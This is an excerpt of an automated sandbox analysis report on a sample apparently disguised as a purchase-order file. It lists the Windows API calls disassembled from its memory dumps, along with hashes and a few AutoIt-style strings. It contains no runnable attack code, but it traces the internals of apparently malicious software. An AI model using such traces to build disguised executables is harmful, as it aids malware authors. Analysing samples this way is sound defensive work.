                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1422805418-0
                                                                                                                                                                                                      • Opcode ID: 273149951996a536410480ec6ac0cd69ebb8ff04d6d08eba4afe8032a158651a
                                                                                                                                                                                                      • Instruction ID: 095ad9ea3ee5b9dc8ee4f7743ff6f5f47cd94fe39c9175350a546944aea4445a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 273149951996a536410480ec6ac0cd69ebb8ff04d6d08eba4afe8032a158651a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08412CB1B002219BEB10DF69EA4475DB7B06F01335F50422FE825AB2D1D7BC9861CB9E
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00468EE4
                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00468EEC
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00468EF7
                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00468F03
                                                                                                                                                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00468F3F
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00468F50
                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0046BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00468F8A
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00468FAA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                      • Opcode ID: 0ef47895ff3c34fcde57304505890fa0abfee302c764309beada644b67fe252c
                                                                                                                                                                                                      • Instruction ID: 611ed22d8254807c85b721b2519c9d3a91f4afa22137adc93f8eb9d36c6173eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ef47895ff3c34fcde57304505890fa0abfee302c764309beada644b67fe252c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD318D72601214BFEB148F50CC49FEB3BAAEF49715F044169FE09EA291D6B99841CB78
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F
                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0047016D
                                                                                                                                                                                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0047038D
                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004703AB
                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 004703D6
                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004703FF
                                                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00470421
                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00470440
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3356174886-0
                                                                                                                                                                                                      • Opcode ID: a9f192c88a830d13c6a57c004f71dec426e7d16346bc4acf5147b0ab99bb992f
                                                                                                                                                                                                      • Instruction ID: 173c988fa6835b5105b4736bd6ec62156792104ef1851415c511a9b98474d389
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9f192c88a830d13c6a57c004f71dec426e7d16346bc4acf5147b0ab99bb992f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87A1AF35601616EBDB18CF68C9857FEBBB1BF04700F04C16AEC58AB291D778AD61CB94
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: ad86bef8a51725d2c0d98b22889656229f96a8a036ca2fc8ab77573dcfcf77f3
                                                                                                                                                                                                      • Instruction ID: 443efc5314a38a124e106a75654bdb1c3ac73b7b7c16e89892f607a707915728
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad86bef8a51725d2c0d98b22889656229f96a8a036ca2fc8ab77573dcfcf77f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74717E70901109EFCB04CF99CC48AEFBB75FF89314F14855AF915AA251C7389A52CFA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0046225A
                                                                                                                                                                                                      • _memset.LIBCMT ref: 00462323
                                                                                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00462368
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                        • Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0046242F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0046243E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                      • API String ID: 4082843840-2766056989
                                                                                                                                                                                                      • Opcode ID: 9b6f1a054f74875a438f1efdd3d3d791c853387bcbe02570d37d45342aca0f8c
                                                                                                                                                                                                      • Instruction ID: fe3cf0ec08732bc4d8dc6c0a237379d0b91af6d135dd8010ae47e82a7a5a3c8a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b6f1a054f74875a438f1efdd3d3d791c853387bcbe02570d37d45342aca0f8c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC716D70A00619AFCF04EFA5C98199EB7F5FF48314F10846EE855AB391DB78AD40CB99
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AF8311,?,00000000,?,00000000,00000000), ref: 00AF7BDE
                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00AF7C59
                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00AF7C74
                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AF7C9A
                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00AF8311,00000000,?,?,?,?,?,?,?,?,?,00AF8311,?), ref: 00AF7CB9
                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00AF8311,00000000,?,?,?,?,?,?,?,?,?,00AF8311,?), ref: 00AF7CF2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                      • Opcode ID: e6ef110b9b17d87514d4a24bdfd6fe75715798999cf150abff4218e7e393e27d
                                                                                                                                                                                                      • Instruction ID: 134fac3034e7b65fffc3290ee96a2fb8353641dfa9916a36bd7d7ccba50d1b3e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6ef110b9b17d87514d4a24bdfd6fe75715798999cf150abff4218e7e393e27d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 425181B1A042499FDB10CFE8DC85AFEBBB8EF09300F14455AFA55E7291DB709941CBA0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00468FE7
                                                                                                                                                                                                      • GetWindowLongW.USER32(00BDE7E8,000000F0), ref: 0046901A
                                                                                                                                                                                                      • GetWindowLongW.USER32(00BDE7E8,000000F0), ref: 0046904F
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00469081
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004690AB
                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 004690BC
                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004690D6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                                                      • Opcode ID: cd13acf13326ff912c1b6a8db85b63e49255f30fb394f9c84299d8e026cc45a0
                                                                                                                                                                                                      • Instruction ID: 6c1353d9cf321ea898b21e40fd174f800445483b6db885a06172db092e97f94c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd13acf13326ff912c1b6a8db85b63e49255f30fb394f9c84299d8e026cc45a0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7313934700215DFDB20CF58DC84F6537A9FB4A718F14026AF5199B2B2DBB5AC40DB4A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004408F2
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00440918
                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0044091B
                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00440939
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00440942
                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00440967
                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00440975
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                      • Opcode ID: b24e518320327f0b4010ffb938235285796caa2b644ac18e69922b42e27cb196
                                                                                                                                                                                                      • Instruction ID: 670d1140b47f98b37c90b3f1203f5f0870597e9ef3b46a752cba0966611f4e2a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b24e518320327f0b4010ffb938235285796caa2b644ac18e69922b42e27cb196
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81219776601219AFEB10AF78DC88DAF73ACEF09360B048526FA15DB291D674EC458768
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                                                                                                      • Opcode ID: 6ee497fbd8dcfb68008fdf971b16c8ec8fe694fdf8472433a62bfcb0ad220d0f
                                                                                                                                                                                                      • Instruction ID: a173347789446804f2164791aadcb3723f806e4114576909bb7f9119596bce02
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ee497fbd8dcfb68008fdf971b16c8ec8fe694fdf8472433a62bfcb0ad220d0f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF216A7160012177E620E6359E12FB77398EF64308FA0402BF446A7182E6ED9982C2AD
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004409CB
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004409F1
                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 004409F4
                                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00440A15
                                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00440A1E
                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00440A38
                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00440A46
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                      • Opcode ID: 81d704a8231c4c79e209fcaaa51a40eda706f52577222d1ed10484e04eabf31d
                                                                                                                                                                                                      • Instruction ID: 220da2e8b19451a2a961b14a861e80d9e5b321ba20eb580aa9f72d8ab3c780ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81d704a8231c4c79e209fcaaa51a40eda706f52577222d1ed10484e04eabf31d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28219B75601204AFEB10EFB8DD89DAB77ECEF183607048536FA09DB2A1D674EC458B58
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
                                                                                                                                                                                                        • Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
                                                                                                                                                                                                        • Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0046A32D
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0046A33A
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0046A345
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0046A354
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0046A360
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                                                      • Opcode ID: a0e80b4b36f74745d8a732ff1c6da4458f8fff69b2c7d0ed606832bd1b4c196d
                                                                                                                                                                                                      • Instruction ID: c087a3ff2feba92329301fd61567ed14b88ced6f3f48c980a85726e2cd280ca0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0e80b4b36f74745d8a732ff1c6da4458f8fff69b2c7d0ed606832bd1b4c196d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4911D0B1500219BEEF104F61CC85EEB7F6DFF08398F014115BA08A21A0D7769C22DBA8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00AF31DA: _free.LIBCMT ref: 00AF3203
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF3264
                                                                                                                                                                                                        • Part of subcall function 00AF2096: HeapFree.KERNEL32(00000000,00000000,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?), ref: 00AF20AC
                                                                                                                                                                                                        • Part of subcall function 00AF2096: GetLastError.KERNEL32(?,?,00AF3208,?,00000000,?,00000000,?,00AF322F,?,00000007,?,?,00AF2697,?,?), ref: 00AF20BE
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF326F
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF327A
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF32CE
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF32D9
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF32E4
                                                                                                                                                                                                      • _free.LIBCMT ref: 00AF32EF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                      • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                                      • Instruction ID: 46eb930caef067ce3e916823c9bfc53fe8dd452e61fdd256a50382c498783b4d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4110D73A40B0CAADE30FBF0CE07FEB779C6F05700F404A15BB9A66152DA65AA048754
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041CCF6
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041CD37
